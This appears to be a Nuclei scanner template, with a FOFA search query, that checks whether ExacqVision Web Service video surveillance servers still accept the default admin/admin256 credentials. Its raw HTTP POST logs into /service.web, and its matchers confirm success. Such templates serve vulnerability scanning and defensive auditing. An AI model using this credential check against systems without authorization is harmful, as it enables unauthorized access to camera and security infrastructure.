Vulnerability Description
ExacqVision Web Service default login credentials (admin/admin256) were discovered.
fofa: ExacqVision
id: exacqvision-default-login

info:
  name: ExacqVision Default Login
  author: ELSFA7110
  severity: high
  description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
  reference:
    - https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
  classification:
    cwe-id: cwe-798
  metadata:
    max-request: 1
  tags: exacqvision,default-login,vuln

http:
  - raw:
      - |
        POST /service.web HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Connection: close

        action=login&u={{username}}&p={{password}}

    payloads:
      username:
        - admin
      password:
        - admin256
    attack: pitchfork

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "application/json"

      - type: word
        part: body
        condition: and
        words:
          - '"auth":'
          - '"success": true'
# digest: 4b0a00483046022100cb67fee8b181c34c891ead9adf619f76f219a76c4fc46fa044c380dcd42ef428022100835ade21632696c39f2ccae557559e4bce926c14a6f243bd4db96f1a34b0661c:922c64590222798bb761d5b6d8e72950